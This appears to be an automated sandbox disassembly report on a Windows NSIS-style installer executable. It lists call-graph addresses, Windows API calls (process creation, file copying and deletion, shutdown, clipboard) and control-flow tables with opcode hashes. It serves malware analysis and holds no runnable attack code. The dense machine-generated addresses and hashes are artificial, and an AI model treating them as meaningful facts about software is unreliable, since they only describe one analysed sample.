3563->3575 3576 4019d1 SearchPathW 3564->3576 3565->3614 3566->3614 3580 4062cf 11 API calls 3567->3580 3581 4062cf 11 API calls 3568->3581 3659 406301 FindFirstFileW 3569->3659 3583 4019a1 3570->3583 3584 40197f 3570->3584 3585 4062cf 11 API calls 3571->3585 3586 4062cf 11 API calls 3572->3586 3587 40145c 18 API calls 3573->3587 3574->3614 3588 4062cf 11 API calls 3575->3588 3576->3547 3576->3614 3577->3614 3589 401664 3578->3589 3590 401785 SetFileAttributesW 3580->3590 3591 401683 3581->3591 3603 4019b8 GetShortPathNameW 3583->3603 3583->3614 3584->3583 3609 406301 2 API calls 3584->3609 3593 4017c9 3585->3593 3594 4016a7 Sleep 3586->3594 3595 4018eb 3587->3595 3596 401627 3588->3596 3597 40139d 65 API calls 3589->3597 3598 40179a 3590->3598 3590->3614 3607 404f9e 25 API calls 3591->3607 3641 405d85 CharNextW CharNextW 3593->3641 3594->3614 3604 40145c 18 API calls 3595->3604 3605 404f9e 25 API calls 3596->3605 3597->3614 3606 4062cf 11 API calls 3598->3606 3599 4018c2 3610 4062cf 11 API calls 3599->3610 3600 4018a9 3608 4062cf 11 API calls 3600->3608 3603->3614 3612 4018f5 3604->3612 3605->3614 3606->3614 3607->3614 3608->3614 3613 401991 3609->3613 3610->3614 3611 4017d4 3615 401864 3611->3615 3618 405d32 CharNextW 3611->3618 3636 4062cf 11 API calls 3611->3636 3616 4062cf 11 API calls 3612->3616 3613->3583 3667 406035 lstrcpynW 3613->3667 3614->3512 3615->3591 3617 40186e 3615->3617 3619 401902 MoveFileW 3616->3619 3647 404f9e 3617->3647 3622 4017e6 CreateDirectoryW 3618->3622 3623 401912 3619->3623 3624 40191e 3619->3624 3622->3611 3626 4017fe GetLastError 3622->3626 3623->3591 3630 406301 2 API calls 3624->3630 3640 401942 3624->3640 3628 401827 GetFileAttributesW 3626->3628 3629 40180b GetLastError 3626->3629 3628->3611 3633 4062cf 11 API calls 3629->3633 3634 401929 3630->3634 3631 401882 SetCurrentDirectoryW 3631->3614 3632 4062cf 11 API calls 3635 40195c 3632->3635 3633->3611 3634->3640 3662 406c94 3634->3662 3635->3614 3636->3611 3639 404f9e 25 API calls 3639->3640 3640->3632 3642 405da2 3641->3642 3645 405db4 3641->3645 3644 405daf CharNextW 3642->3644 3642->3645 3643 405dd8 3643->3611 3644->3643 3645->3643 3646 405d32 CharNextW 3645->3646 3646->3645 3648 404fb7 3647->3648 3649 401875 3647->3649 3650 404fd5 lstrlenW 3648->3650 3651 406831 18 API calls 3648->3651 3658 406035 lstrcpynW 3649->3658 3652 404fe3 lstrlenW 3650->3652 3653 404ffe 3650->3653 3651->3650 3652->3649 3654 404ff5 lstrcatW 3652->3654 3655 405011 3653->3655 3656 405004 SetWindowTextW 3653->3656 3654->3653 3655->3649 3657 405017 SendMessageW SendMessageW SendMessageW 3655->3657 3656->3655 3657->3649 3658->3631 3660 4018a5 3659->3660 3661 406317 FindClose 3659->3661 3660->3599 3660->3600 3661->3660 3669 406328 GetModuleHandleA 3662->3669 3666 401936 3666->3639 3667->3583 3668->3614 3670 406340 LoadLibraryA 3669->3670 3671 40634b GetProcAddress 3669->3671 3670->3671 3672 406359 3670->3672 3671->3672 3672->3666 3673 406ac5 lstrcpyW 3672->3673 3674 406b13 GetShortPathNameW 3673->3674 3675 406aea 3673->3675 3676 406b2c 3674->3676 3677 406c8e 3674->3677 3699 405e7c GetFileAttributesW CreateFileW 3675->3699 3676->3677 3680 406b34 WideCharToMultiByte 3676->3680 3677->3666 3679 406af3 CloseHandle GetShortPathNameW 3679->3677 3681 406b0b 3679->3681 3680->3677 3682 406b51 WideCharToMultiByte 3680->3682 3681->3674 3681->3677 3682->3677 3683 406b69 wsprintfA 3682->3683 3684 406831 18 API calls 3683->3684 3685 406b95 3684->3685 3700 405e7c GetFileAttributesW CreateFileW 3685->3700 3687 406ba2 3687->3677 3688 406baf GetFileSize GlobalAlloc 3687->3688 3689 406bd0 ReadFile 3688->3689 3690 406c84 CloseHandle 3688->3690 3689->3690 3691 406bea 3689->3691 3690->3677 3691->3690 3701 405de2 lstrlenA 3691->3701 3694 406c03 lstrcpyA 3697 406c25 3694->3697 3695 406c17 3696 405de2 4 API calls 3695->3696 3696->3697 3698 406c5c SetFilePointer WriteFile GlobalFree 3697->3698 3698->3690 3699->3679 3700->3687 3702 405e23 lstrlenA 3701->3702 3703 405e2b 3702->3703 3704 405dfc lstrcmpiA 3702->3704 3703->3694 3703->3695 3704->3703 3705 405e1a CharNextA 3704->3705 3705->3702 4865 402da5 4866 4030e3 4865->4866 4867 402dac 4865->4867 4868 401446 18 API calls 4867->4868 4869 402db8 4868->4869 4870 402dbf SetFilePointer 4869->4870 4870->4866 4871 402dcf 4870->4871 4871->4866 4873 405f7d wsprintfW 4871->4873 4873->4866 4874 4049a8 GetDlgItem GetDlgItem 4875 4049fe 7 API calls 4874->4875 4880 404c16 4874->4880 4876 404aa2 DeleteObject 4875->4876 4877 404a96 SendMessageW 4875->4877 4878 404aad 4876->4878 4877->4876 4881 404ae4 4878->4881 4884 406831 18 API calls 4878->4884 4879 404cfb 4882 404da0 4879->4882 4883 404c09 4879->4883 4888 404d4a SendMessageW 4879->4888 4880->4879 4892 40487a 5 API calls 4880->4892 4905 404c86 4880->4905 4887 403d6b 19 API calls 4881->4887 4885 404db5 4882->4885 4886 404da9 SendMessageW 4882->4886 4889 403df6 8 API calls 4883->4889 4890 404ac6 SendMessageW SendMessageW 4884->4890 4897 404dc7 ImageList_Destroy 4885->4897 4898 404dce 4885->4898 4903 404dde 4885->4903 4886->4885 4893 404af8 4887->4893 4888->4883 4895 404d5f SendMessageW 4888->4895 4896 404f97 4889->4896 4890->4878 4891 404ced SendMessageW 4891->4879 4892->4905 4899 403d6b 19 API calls 4893->4899 4894 404f48 4894->4883 4904 404f5d ShowWindow GetDlgItem ShowWindow 4894->4904 4900 404d72 4895->4900 4897->4898 4901 404dd7 GlobalFree 4898->4901 4898->4903 4907 404b09 4899->4907 4909 404d83 SendMessageW 4900->4909 4901->4903 4902 404bd6 GetWindowLongW SetWindowLongW 4906 404bf0 4902->4906 4903->4894 4908 40141d 80 API calls 4903->4908 4918 404e10 4903->4918 4904->4883 4905->4879 4905->4891 4910 404bf6 ShowWindow 4906->4910 4911 404c0e 4906->4911 4907->4902 4913 404b65 SendMessageW 4907->4913 4914 404bd0 4907->4914 4916 404b93 SendMessageW 4907->4916 4917 404ba7 SendMessageW 4907->4917 4908->4918 4909->4882 4925 403dc4 SendMessageW 4910->4925 4926 403dc4 SendMessageW 4911->4926 4913->4907 4914->4902 4914->4906 4916->4907 4917->4907 4919 404e54 4918->4919 4922 404e3e SendMessageW 4918->4922 4920 404f1f InvalidateRect 4919->4920 4924 404ecd SendMessageW SendMessageW 4919->4924 4920->4894 4921 404f35 4920->4921 4923 4043d9 21 API calls 4921->4923 4922->4919 4923->4894 4924->4919 4925->4883 4926->4880 4927 4030a9 SendMessageW 4928 4030c2 InvalidateRect 4927->4928 4929 4030e3 4927->4929 4928->4929 3880 4038af #17 SetErrorMode OleInitialize 3881 406328 3 API calls 3880->3881 3882 4038f2 SHGetFileInfoW 3881->3882 3954 406035 lstrcpynW 3882->3954 3884 40391d GetCommandLineW 3955 406035 lstrcpynW 3884->3955 3886 40392f GetModuleHandleW 3887 403947 3886->3887 3888 405d32 CharNextW 3887->3888 3889 403956 CharNextW 3888->3889 3900 403968 3889->3900 3890 403a02 3891 403a21 GetTempPathW 3890->3891 3956 4037f8 3891->3956 3893 403a37 3895 403a3b GetWindowsDirectoryW lstrcatW 3893->3895 3896 403a5f DeleteFileW 3893->3896 3894 405d32 CharNextW 3894->3900 3898 4037f8 11 API calls 3895->3898 3964 4035b3 GetTickCount GetModuleFileNameW 3896->3964 3901 403a57 3898->3901 3899 403a73 3902 403af8 3899->3902 3904 405d32 CharNextW 3899->3904 3940 403add 3899->3940 3900->3890 3900->3894 3907 403a04 3900->3907 3901->3896 3901->3902 4049 403885 3902->4049 3908 403a8a 3904->3908 4056 406035 lstrcpynW 3907->4056 3919 403b23 lstrcatW lstrcmpiW 3908->3919 3920 403ab5 3908->3920 3909 403aed 3912 406113 9 API calls 3909->3912 3910 403bfa 3913 403c7d 3910->3913 3915 406328 3 API calls 3910->3915 3911 403b0d 3914 405ccc MessageBoxIndirectW 3911->3914 3912->3902 3916 403b1b ExitProcess 3914->3916 3918 403c09 3915->3918 3922 406328 3 API calls 3918->3922 3919->3902 3921 403b3f CreateDirectoryW SetCurrentDirectoryW 3919->3921 4057 4067aa 3920->4057 3924 403b62 3921->3924 3925 403b57 3921->3925 3926 403c12 3922->3926 4074 406035 lstrcpynW 3924->4074 4073 406035 lstrcpynW 3925->4073 3930 406328 3 API calls 3926->3930 3933 403c1b 3930->3933 3932 403b70 4075 406035 lstrcpynW 3932->4075 3934 403c69 ExitWindowsEx 3933->3934 3939 403c29 GetCurrentProcess 3933->3939 3934->3913 3938 403c76 3934->3938 3935 403ad2 4072 406035 lstrcpynW 3935->4072 3941 40141d 80 API calls 3938->3941 3943 403c39 3939->3943 3992 405958 3940->3992 3941->3913 3942 406831 18 API calls 3944 403b98 DeleteFileW 3942->3944 3943->3934 3945 403ba5 CopyFileW 3944->3945 3951 403b7f 3944->3951 3945->3951 3946 403bee 3947 406c94 42 API calls 3946->3947 3949 403bf5 3947->3949 3948 406c94 42 API calls 3948->3951 3949->3902 3950 406831 18 API calls 3950->3951 3951->3942 3951->3946 3951->3948 3951->3950 3953 403bd9 CloseHandle 3951->3953 4076 405c6b CreateProcessW 3951->4076 3953->3951 3954->3884 3955->3886 3957 406064 5 API calls 3956->3957 3958 403804 3957->3958 3959 40380e 3958->3959 3960 40674e 3 API calls 3958->3960 3959->3893 3961 403816 CreateDirectoryW 3960->3961 3962 405eab 2 API calls 3961->3962 3963 40382a 3962->3963 3963->3893 4079 405e7c GetFileAttributesW CreateFileW 3964->4079 3966 4035f3 3986 403603 3966->3986 4080 406035 lstrcpynW 3966->4080 3968 403619 4081 40677d lstrlenW 3968->4081 3972 40362a GetFileSize 3973 403726 3972->3973 3987 403641 3972->3987 4086 4032d2 3973->4086 3975 40372f 3977 40376b GlobalAlloc 3975->3977 3975->3986 4098 403368 SetFilePointer 3975->4098 3976 403336 ReadFile 3976->3987 4097 403368 SetFilePointer 3977->4097 3980 4037e9 3983 4032d2 6 API calls 3980->3983 3981 403786 3984 40337f 33 API calls 3981->3984 3982 40374c 3985 403336 ReadFile 3982->3985 3983->3986 3990 403792 3984->3990 3989 403757 3985->3989 3986->3899 3987->3973 3987->3976 3987->3980 3987->3986 3988 4032d2 6 API calls 3987->3988 3988->3987 3989->3977 3989->3986 3990->3986 3990->3990 3991 4037c0 SetFilePointer 3990->3991 3991->3986 3993 406328 3 API calls 3992->3993 3994 40596c 3993->3994 3995 405972 3994->3995 3996 405984 3994->3996 4112 405f7d wsprintfW 3995->4112 3997 405eff 3 API calls 3996->3997 3998 4059b5 3997->3998 4000 4059d4 lstrcatW 3998->4000 4002 405eff 3 API calls 3998->4002 4001 405982 4000->4001 4103 403ec1 4001->4103 4002->4000 4005 4067aa 18 API calls 4006 405a06 4005->4006 4007 405a9c 4006->4007 4009 405eff 3 API calls 4006->4009 4008 4067aa 18 API calls 4007->4008 4010 405aa2 4008->4010 4011 405a38 4009->4011 4012 405ab2 4010->4012 4013 406831 18 API calls 4010->4013 4011->4007 4015 405a5b lstrlenW 4011->4015 4018 405d32 CharNextW 4011->4018 4014 405ad2 LoadImageW 4012->4014 4114 403ea0 4012->4114 4013->4012 4016 405b92 4014->4016 4017 405afd RegisterClassW 4014->4017 4019 405a69 lstrcmpiW 4015->4019 4020 405a8f 4015->4020 4024 40141d 80 API calls 4016->4024 4022 405b9c 4017->4022 4023 405b45 SystemParametersInfoW CreateWindowExW 4017->4023 4025 405a56 4018->4025 4019->4020 4026 405a79 GetFileAttributesW 4019->4026 4028 40674e 3 API calls 4020->4028 4022->3909 4023->4016 4029 405b98 4024->4029 4025->4015 4030 405a85 4026->4030 4027 405ac8 4027->4014 4031 405a95 4028->4031 4029->4022 4032 403ec1 19 API calls 4029->4032 4030->4020 4033 40677d 2 API calls 4030->4033 4113 406035 lstrcpynW 4031->4113 4035 405ba9 4032->4035 4033->4020 4036 405bb5 ShowWindow LoadLibraryW 4035->4036 4037 405c38 4035->4037 4038 405bd4 LoadLibraryW 4036->4038 4039 405bdb GetClassInfoW 4036->4039 4040 405073 83 API calls 4037->4040 4038->4039 4041 405c05 DialogBoxParamW 4039->4041 4042 405bef GetClassInfoW RegisterClassW 4039->4042 4043 405c3e 4040->4043 4046 40141d 80 API calls 4041->4046 4042->4041 4044 405c42 4043->4044 4045 405c5a 4043->4045 4044->4022 4048 40141d 80 API calls 4044->4048 4047 40141d 80 API calls 4045->4047 4046->4022 4047->4022 4048->4022 4050 40389d 4049->4050 4051 40388f CloseHandle 4049->4051 4121 403caf 4050->4121 4051->4050 4056->3891 4174 406035 lstrcpynW 4057->4174 4059 4067bb 4060 405d85 4 API calls 4059->4060 4061 4067c1 4060->4061 4062 406064 5 API calls 4061->4062 4069 403ac3 4061->4069 4065 4067d1 4062->4065 4063 406809 lstrlenW 4064 406810 4063->4064 4063->4065 4067 40674e 3 API calls 4064->4067 4065->4063 4066 406301 2 API calls 4065->4066 4065->4069 4070 40677d 2 API calls 4065->4070 4066->4065 4068 406816 GetFileAttributesW 4067->4068 4068->4069 4069->3902 4071 406035 lstrcpynW 4069->4071 4070->4063 4071->3935 4072->3940 4073->3924 4074->3932 4075->3951 4077 405ca6 4076->4077 4078 405c9a CloseHandle 4076->4078 4077->3951 4078->4077 4079->3966 4080->3968 4082 40678c 4081->4082 4083 406792 CharPrevW 4082->4083 4084 40361f 4082->4084 4083->4082 4083->4084 4085 406035 lstrcpynW 4084->4085 4085->3972 4087 4032f3 4086->4087 4088 4032db 4086->4088 4091 403303 GetTickCount 4087->4091 4092 4032fb 4087->4092 4089 4032e4 DestroyWindow 4088->4089 4090 4032eb 4088->4090 4089->4090 4090->3975 4094 403311 CreateDialogParamW ShowWindow 4091->4094 4095 403334 4091->4095 4099 40635e 4092->4099 4094->4095 4095->3975 4097->3981 4098->3982 4100 40637b PeekMessageW 4099->4100 4101 406371 DispatchMessageW 4100->4101 4102 403301 4100->4102 4101->4100 4102->3975 4104 403ed5 4103->4104 4119 405f7d wsprintfW 4104->4119 4106 403f49 4107 406831 18 API calls 4106->4107 4108 403f55 SetWindowTextW 4107->4108 4109 403f70 4108->4109 4110 403f8b 4109->4110 4111 406831 18 API calls 4109->4111 4110->4005 4111->4109 4112->4001 4113->4007 4120 406035 lstrcpynW 4114->4120 4116 403eb4 4117 40674e 3 API calls 4116->4117 4118 403eba lstrcatW 4117->4118 4118->4027 4119->4106 4120->4116 4122 403cbd 4121->4122 4123 4038a2 4122->4123 4124 403cc2 FreeLibrary GlobalFree 4122->4124 4125 406cc7 4123->4125 4124->4123 4124->4124 4126 4067aa 18 API calls 4125->4126 4127 406cda 4126->4127 4128 406ce3 DeleteFileW 4127->4128 4129 406cfa 4127->4129 4168 4038ae CoUninitialize 4128->4168 4130 406e77 4129->4130 4172 406035 lstrcpynW 4129->4172 4136 406301 2 API calls 4130->4136 4156 406e84 4130->4156 4130->4168 4132 406d25 4133 406d39 4132->4133 4134 406d2f lstrcatW 4132->4134 4137 40677d 2 API calls 4133->4137 4135 406d3f 4134->4135 4139 406d4f lstrcatW 4135->4139 4141 406d57 lstrlenW FindFirstFileW 4135->4141 4138 406e90 4136->4138 4137->4135 4142 40674e 3 API calls 4138->4142 4138->4168 4139->4141 4140 4062cf 11 API calls 4140->4168 4145 406e67 4141->4145 4169 406d7e 4141->4169 4143 406e9a 4142->4143 4146 4062cf 11 API calls 4143->4146 4144 405d32 CharNextW 4144->4169 4145->4130 4147 406ea5 4146->4147 4148 405e5c 2 API calls 4147->4148 4149 406ead RemoveDirectoryW 4148->4149 4153 406ef0 4149->4153 4154 406eb9 4149->4154 4150 406e44 FindNextFileW 4152 406e5c FindClose 4150->4152 4150->4169 4152->4145 4155 404f9e 25 API calls 4153->4155 4154->4156 4157 406ebf 4154->4157 4155->4168 4156->4140 4159 4062cf 11 API calls 4157->4159 4158 4062cf 11 API calls 4158->4169 4160 406ec9 4159->4160 4163 404f9e 25 API calls 4160->4163 4161 406cc7 72 API calls 4161->4169 4162 405e5c 2 API calls 4164 406dfa DeleteFileW 4162->4164 4165 406ed3 4163->4165 4164->4169 4166 406c94 42 API calls 4165->4166 4166->4168 4167 404f9e 25 API calls 4167->4150 4168->3910 4168->3911 4169->4144 4169->4150 4169->4158 4169->4161 4169->4162 4169->4167 4170 404f9e 25 API calls 4169->4170 4171 406c94 42 API calls 4169->4171 4173 406035 lstrcpynW 4169->4173 4170->4169 4171->4169 4172->4132 4173->4169 4174->4059 4930 401cb2 4931 40145c 18 API calls 4930->4931 4932 401c54 4931->4932 4933 4062cf 11 API calls 4932->4933 4934 401c64 4932->4934 4935 401c59 4933->4935 4936 406cc7 81 API calls 4935->4936 4936->4934 3706 4021b5 3707 40145c 18 API calls 3706->3707 3708 4021bb 3707->3708 3709 40145c 18 API calls 3708->3709 3710 4021c4 3709->3710 3711 40145c 18 API calls 3710->3711 3712 4021cd 3711->3712 3713 40145c 18 API calls 3712->3713 3714 4021d6 3713->3714 3715 404f9e 25 API calls 3714->3715 3716 4021e2 ShellExecuteW 3715->3716 3717 40221b 3716->3717 3718 40220d 3716->3718 3719 4062cf 11 API calls 3717->3719 3720 4062cf 11 API calls 3718->3720 3721 402230 3719->3721 3720->3717 4937 402238 4938 40145c 18 API calls 4937->4938 4939 40223e 4938->4939 4940 4062cf 11 API calls 4939->4940 4941 40224b 4940->4941 4942 404f9e 25 API calls 4941->4942 4943 402255 4942->4943 4944 405c6b 2 API calls 4943->4944 4945 40225b 4944->4945 4946 4062cf 11 API calls 4945->4946 4954 4022ac CloseHandle 4945->4954 4951 40226d 4946->4951 4948 4030e3 4949 402283 WaitForSingleObject 4950 402291 GetExitCodeProcess 4949->4950 4949->4951 4953 4022a3 4950->4953 4950->4954 4951->4949 4952 40635e 2 API calls 4951->4952 4951->4954 4952->4949 4956 405f7d wsprintfW 4953->4956 4954->4948 4956->4954 4957 404039 4958 404096 4957->4958 4959 404046 lstrcpynA lstrlenA 4957->4959 4959->4958 4960 404077 4959->4960 4960->4958 4961 404083 GlobalFree 4960->4961 4961->4958 4962 401eb9 4963 401f24 4962->4963 4966 401ec6 4962->4966 4964 401f53 GlobalAlloc 4963->4964 4968 401f28 4963->4968 4970 406831 18 API calls 4964->4970 4965 401ed5 4969 4062cf 11 API calls 4965->4969 4966->4965 4972 401ef7 4966->4972 4967 401f36 4986 406035 lstrcpynW 4967->4986 4968->4967 4971 4062cf 11 API calls 4968->4971 4981 401ee2 4969->4981 4974 401f46 4970->4974 4971->4967 4984 406035 lstrcpynW 4972->4984 4976 402708 4974->4976 4977 402387 GlobalFree 4974->4977 4977->4976 4978 401f06 4985 406035 lstrcpynW 4978->4985 4979 406831 18 API calls 4979->4981 4981->4976 4981->4979 4982 401f15 4987 406035 lstrcpynW 4982->4987 4984->4978 4985->4982 4986->4974 4987->4976

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 0 4050f9-405114 1 4052c1-4052c8 0->1 2 40511a-405201 GetDlgItem * 3 call 403dc4 call 4044a2 call 406831 call 4062cf GetClientRect GetSystemMetrics SendMessageW * 2 0->2 3 4052f2-4052ff 1->3 4 4052ca-4052ec GetDlgItem CreateThread CloseHandle 1->4 35 405203-40521d SendMessageW * 2 2->35 36 40521f-405222 2->36 6 405320-405327 3->6 7 405301-40530a 3->7 4->3 11 405329-40532f 6->11 12 40537e-405382 6->12 9 405342-40534b call 403df6 7->9 10 40530c-40531b ShowWindow * 2 call 403dc4 7->10 22 405350-405354 9->22 10->6 16 405331-40533d call 403d44 11->16 17 405357-405367 ShowWindow 11->17 12->9 14 405384-405387 12->14 14->9 20 405389-40539c SendMessageW 14->20 16->9 23 405377-405379 call 403d44 17->23 24 405369-405372 call 404f9e 17->24 29 4053a2-4053c3 CreatePopupMenu call 406831 AppendMenuW 20->29 30 4052ba-4052bc 20->30 23->12 24->23 37 4053c5-4053d6 GetWindowRect 29->37 38 4053d8-4053de 29->38 30->22 35->36 39 405232-405249 call 403d6b 36->39 40 405224-405230 SendMessageW 36->40 41 4053df-4053f7 TrackPopupMenu 37->41 38->41 46 40524b-40525f ShowWindow 39->46 47 40527f-4052a0 GetDlgItem SendMessageW 39->47 40->39 41->30 43 4053fd-405414 41->43 45 405419-405434 SendMessageW 43->45 45->45 48 405436-405459 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 45->48 49 405261-40526c ShowWindow 46->49 50 40526e 46->50 47->30 51 4052a2-4052b8 SendMessageW * 2 47->51 52 40545b-405484 SendMessageW 48->52 54 405274-40527a call 403dc4 49->54 50->54 51->30 52->52 53 405486-4054a0 GlobalUnlock SetClipboardData CloseClipboard 52->53 53->30 54->47
                                        APIs
                                        • GetDlgItem.USER32(?,00000403), ref: 0040515B
                                        • GetDlgItem.USER32(?,000003EE), ref: 0040516A
                                        • GetClientRect.USER32(?,?), ref: 004051C2
                                        • GetSystemMetrics.USER32(00000015), ref: 004051CA
                                        • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051EB
                                        • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051FC
                                        • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040520F
                                        • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040521D
                                        • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405230
                                        • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405252
                                        • ShowWindow.USER32(?,00000008), ref: 00405266
                                        • GetDlgItem.USER32(?,000003EC), ref: 00405287
                                        • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405297
                                        • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004052AC
                                        • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004052B8
                                        • GetDlgItem.USER32(?,000003F8), ref: 00405179
                                          • Part of subcall function 00403DC4: SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2
                                          • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00426979,759223A0,00000000), ref: 00406902
                                          • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                          • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                        • GetDlgItem.USER32(?,000003EC), ref: 004052D7
                                        • CreateThread.KERNELBASE(00000000,00000000,Function_00005073,00000000), ref: 004052E5
                                        • CloseHandle.KERNELBASE(00000000), ref: 004052EC
                                        • ShowWindow.USER32(00000000), ref: 00405313
                                        • ShowWindow.USER32(?,00000008), ref: 00405318
                                        • ShowWindow.USER32(00000008), ref: 0040535F
                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405391
                                        • CreatePopupMenu.USER32 ref: 004053A2
                                        • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004053B7
                                        • GetWindowRect.USER32(?,?), ref: 004053CA
                                        • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053EC
                                        • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405427
                                        • OpenClipboard.USER32(00000000), ref: 00405437
                                        • EmptyClipboard.USER32 ref: 0040543D
                                        • GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 00405449
                                        • GlobalLock.KERNEL32(00000000), ref: 00405453
                                        • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405467
                                        • GlobalUnlock.KERNEL32(00000000), ref: 00405489
                                        • SetClipboardData.USER32(0000000D,00000000), ref: 00405494
                                        • CloseClipboard.USER32 ref: 0040549A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2036889192.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2036859730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036912745.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2037059509.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                        Similarity
                                        • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
                                        • String ID: New install of "%s" to "%s"${
                                        • API String ID: 2110491804-1641061399
                                        • Opcode ID: 27dd6abe78b25364254968db719b86f88dfe8c12dd5559a56974b496927f2e5b
                                        • Instruction ID: db3ff0878cedf1d1b3e6f9985675ba3e3c8e3ad145c0decdf5c07b0ce3ef5d1a
                                        • Opcode Fuzzy Hash: 27dd6abe78b25364254968db719b86f88dfe8c12dd5559a56974b496927f2e5b
                                        • Instruction Fuzzy Hash: 46B15970900609BFEB11AFA1DD89EAE7B79FB04354F00803AFA05BA1A1C7755E81DF58

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 202 4038af-403945 #17 SetErrorMode OleInitialize call 406328 SHGetFileInfoW call 406035 GetCommandLineW call 406035 GetModuleHandleW 209 403947-40394a 202->209 210 40394f-403963 call 405d32 CharNextW 202->210 209->210 213 4039f6-4039fc 210->213 214 403a02 213->214 215 403968-40396e 213->215 216 403a21-403a39 GetTempPathW call 4037f8 214->216 217 403970-403976 215->217 218 403978-40397c 215->218 228 403a3b-403a59 GetWindowsDirectoryW lstrcatW call 4037f8 216->228 229 403a5f-403a79 DeleteFileW call 4035b3 216->229 217->217 217->218 219 403984-403988 218->219 220 40397e-403983 218->220 222 4039e4-4039f1 call 405d32 219->222 223 40398a-403991 219->223 220->219 222->213 237 4039f3 222->237 226 403993-40399a 223->226 227 4039a6-4039b8 call 40382c 223->227 232 4039a1 226->232 233 40399c-40399f 226->233 242 4039ba-4039c1 227->242 243 4039cd-4039e2 call 40382c 227->243 228->229 240 403af8-403b07 call 403885 CoUninitialize 228->240 229->240 241 403a7b-403a81 229->241 232->227 233->227 233->232 237->213 257 403bfa-403c00 240->257 258 403b0d-403b1d call 405ccc ExitProcess 240->258 244 403ae1-403ae8 call 405958 241->244 245 403a83-403a8c call 405d32 241->245 247 4039c3-4039c6 242->247 248 4039c8 242->248 243->222 254 403a04-403a1c call 40824c call 406035 243->254 256 403aed-403af3 call 406113 244->256 260 403aa5-403aa7 245->260 247->243 247->248 248->243 254->216 256->240 262 403c02-403c1f call 406328 * 3 257->262 263 403c7d-403c85 257->263 267 403aa9-403ab3 260->267 268 403a8e-403aa0 call 40382c 260->268 293 403c21-403c23 262->293 294 403c69-403c74 ExitWindowsEx 262->294 269 403c87 263->269 270 403c8b 263->270 275 403b23-403b3d lstrcatW lstrcmpiW 267->275 276 403ab5-403ac5 call 4067aa 267->276 268->267 283 403aa2 268->283 269->270 275->240 277 403b3f-403b55 CreateDirectoryW SetCurrentDirectoryW 275->277 276->240 286 403ac7-403add call 406035 * 2 276->286 281 403b62-403b82 call 406035 * 2 277->281 282 403b57-403b5d call 406035 277->282 303 403b87-403ba3 call 406831 DeleteFileW 281->303 282->281 283->260 286->244 293->294 297 403c25-403c27 293->297 294->263 300 403c76-403c78 call 40141d 294->300 297->294 301 403c29-403c3b GetCurrentProcess 297->301 300->263 301->294 308 403c3d-403c5f 301->308 309 403be4-403bec 303->309 310 403ba5-403bb5 CopyFileW 303->310 308->294 309->303 311 403bee-403bf5 call 406c94 309->311 310->309 312 403bb7-403bd7 call 406c94 call 406831 call 405c6b 310->312 311->240 312->309 322 403bd9-403be0 CloseHandle 312->322 322->309
                                        APIs
                                        • #17.COMCTL32 ref: 004038CE
                                        • SetErrorMode.KERNELBASE(00008001), ref: 004038D9
                                        • OleInitialize.OLE32(00000000), ref: 004038E0
                                          • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                          • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                          • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
                                        • SHGetFileInfoW.SHELL32(0040A264,00000000,?,000002B4,00000000), ref: 00403908
                                          • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                        • GetCommandLineW.KERNEL32(00476AA0,NSIS Error), ref: 0040391D
                                        • GetModuleHandleW.KERNEL32(00000000,004CF0A0,00000000), ref: 00403930
                                        • CharNextW.USER32(00000000,004CF0A0,00000020), ref: 00403957
                                        • GetTempPathW.KERNEL32(00002004,004E30C8,00000000,00000020), ref: 00403A2C
                                        • GetWindowsDirectoryW.KERNEL32(004E30C8,00001FFF), ref: 00403A41
